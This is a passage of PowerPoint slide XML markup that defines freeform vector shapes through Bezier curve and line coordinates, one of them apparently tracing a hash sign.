                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="152" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="131" y="157"/>
                      <a:pt x="130" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="124" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="121" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="157" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="182"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="160" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="159" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="84" y="73"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>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4"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="51" y="108"/>
                      <a:pt x="49" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="45" y="122"/>
                      <a:pt x="45" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="45" y="133"/>
                      <a:pt x="45" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="137"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="140"/>
                      <a:pt x="40" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="124"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="121"/>
                      <a:pt x="37" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="36" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="36" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="37" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="47" y="150"/>
                      <a:pt x="51" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="157"/>
                      <a:pt x="61" y="161"/>
                      <a:pt x="66" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="69" y="170"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="66" y="177"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="65" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="194"/>
                      <a:pt x="69" y="196"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="196"/>
                      <a:pt x="72" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="188"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="68" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="185"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="187"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="96" y="185"/>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8"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="118" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="128" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="139" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="98"/>
                      <a:pt x="134" y="104"/>
                      <a:pt x="136" y="110"/>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4"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="116" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="61"/>
                      <a:pt x="106" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="103" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="91" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="38"/>
                      <a:pt x="94" y="36"/>
                      <a:pt x="97" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="100" y="38"/>
                      <a:pt x="101" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="106" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="99" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="87" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="39"/>
                      <a:pt x="86" y="41"/>
                      <a:pt x="86" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="44"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="82" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="79" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="77" y="46"/>
                      <a:pt x="77" y="44"/>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0"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="67" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="67" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="70" y="36"/>
                      <a:pt x="72" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="74" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="48"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="51"/>
                      <a:pt x="68" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="64" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="77" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="90" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="102" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="101" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="63"/>
                      <a:pt x="91" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="71" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="71"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5" name="Freeform 122"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="3708"/>
                <a:ext cx="3"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0"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6" name="Freeform 123"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4093" y="3708"/>
                <a:ext cx="3" cy="3"/>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2" y="2"/>
                      <a:pt x="2"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Freeform 124"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2044"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Freeform 125"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 126"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2388"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Freeform 127"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2813"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Freeform 128"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2960"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2" name="Freeform 129"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3159"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Freeform 130"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3308"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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23"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4" name="Freeform 131"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3456" y="4023"/>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Freeform 132"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3654"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Freeform 133"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="380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Freeform 134"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3996"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Freeform 135"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="419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Freeform 136"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4389"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Freeform 137"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="453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Freeform 138"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723" y="4027"/>
                <a:ext cx="187" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 184 w 187"/>
                  <a:gd name="T3" fmla="*/ 85 h 220"/>
                  <a:gd name="T4" fmla="*/ 141 w 187"/>
                  <a:gd name="T5" fmla="*/ 85 h 220"/>
                  <a:gd name="T6" fmla="*/ 130 w 187"/>
                  <a:gd name="T7" fmla="*/ 135 h 220"/>
                  <a:gd name="T8" fmla="*/ 176 w 187"/>
                  <a:gd name="T9" fmla="*/ 135 h 220"/>
                  <a:gd name="T10" fmla="*/ 173 w 187"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 126 w 187"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 112 w 187"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 91 w 187"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 106 w 187"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 187"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 50 w 187"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 29 w 187"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 42 w 187"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 2 w 187"/>
                  <a:gd name="T31" fmla="*/ 135 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 187"/>
                  <a:gd name="T33" fmla="*/ 135 h 220"/>
                  <a:gd name="T34" fmla="*/ 57 w 187"/>
                  <a:gd name="T35" fmla="*/ 85 h 220"/>
                  <a:gd name="T36" fmla="*/ 11 w 187"/>
                  <a:gd name="T37" fmla="*/ 85 h 220"/>
                  <a:gd name="T38" fmla="*/ 14 w 187"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 61 w 187"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 74 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 95 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 81 w 187"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 123 w 187"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 137 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 158 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 187"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 187 w 187"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 120 w 187"/>
                  <a:gd name="T59" fmla="*/ 85 h 220"/>
                  <a:gd name="T60" fmla="*/ 78 w 187"/>
                  <a:gd name="T61" fmla="*/ 85 h 220"/>
                  <a:gd name="T62" fmla="*/ 67 w 187"/>
                  <a:gd name="T63" fmla="*/ 135 h 220"/>
                  <a:gd name="T64" fmla="*/ 109 w 187"/>
                  <a:gd name="T65" fmla="*/ 135 h 220"/>
                  <a:gd name="T66" fmla="*/ 120 w 187"/>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20">
                    <a:moveTo>
                      <a:pt x="187" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
